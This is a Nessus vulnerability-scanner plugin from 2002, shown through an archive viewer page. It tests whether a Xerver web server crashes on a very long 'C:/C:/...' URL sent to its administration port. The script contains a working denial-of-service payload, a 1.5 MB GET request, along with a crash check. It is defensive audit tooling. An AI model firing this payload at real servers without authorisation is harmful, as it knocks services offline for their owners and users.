home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / Xerver_DoS.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  88 lines

  1. #
  2. # This script was written by Michel Arboi <arboi@alussinan.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. # Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
  7. #      Erik Anderson <eanders@carmichaelsecurity.com>
  8. #      Added BugtraqID and CAN
  9. #
  10. # From Bugtraq :
  11. # Date: Fri, 8 Mar 2002 18:39:39 -0500 ?
  12. # From:"Alex Hernandez" <al3xhernandez@ureach.com> 
  13.  
  14. if(description)
  15. {
  16.  script_id(11015);
  17.  script_bugtraq_id(4254);
  18.  script_version("$Revision: 1.8 $");
  19.  script_cve_id("CAN-2002-0448");
  20.  name["english"] = "Xerver web server DOS";
  21.  name["francais"] = "DΘni de service contre Xerver";
  22.  script_name(english:name["english"], francais:name["francais"]);
  23.  
  24.  desc["english"] = "It was possible to crash
  25. the Xerver web server by sending a long URL 
  26. (C:/C:/...C:/) to its administration port.
  27.  
  28. A cracker may use this attack to make this
  29. service crash continuously.
  30.  
  31.  
  32. Solution: upgrade your software
  33.  
  34. Risk factor : High";
  35.  
  36.  
  37.  desc["francais"] = "Il a ΘtΘ possible de tuer
  38. le serveur web Xerver en envoyant une URL longue
  39. (C:/C:/...C:/) α son port d'administration.
  40.  
  41. Un pirate peut exploiter cette faille 
  42. pour faire planter continuellement ce
  43. service.
  44.  
  45.  
  46. Solution: mettez α jour votre logiciel
  47.  
  48. Facteur de risque : ElevΘ";
  49.  
  50.  script_description(english:desc["english"], francais:desc["francais"]);
  51.  
  52.  summary["english"] = "Xerver DOS";
  53.  summary["francais"] = "DΘni de service contre Xerver";
  54.  script_summary(english:summary["english"], francais:summary["francais"]);
  55.  
  56.  script_category(ACT_DENIAL);
  57.  
  58.  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
  59.         francais:"Ce script est Copyright (C) 2002 Michel Arboi");
  60.   family["english"] = "Denial of Service";
  61.   family["francais"] = "DΘni de service";
  62.  
  63.  script_family(english:family["english"], francais:family["francais"]);
  64.  script_require_ports(32123);
  65.  exit(0);
  66. }
  67.  
  68. #
  69.  
  70. port=32123;
  71. if (! get_port_state(port)) exit(0);
  72. soc = open_sock_tcp(port);
  73. if (!soc) exit(0);
  74. s = string("GET /", crap(data:"C:/", length:1500000), "\r\n\r\n");
  75. send(socket:soc, data:s);
  76. close(soc);
  77.  
  78. soc = open_sock_tcp(port);
  79. if (! soc)
  80. {
  81.  security_hole(port);
  82.  exit(0);
  83. }
  84.  
  85. close(soc);
  86.  
  87.  
  88.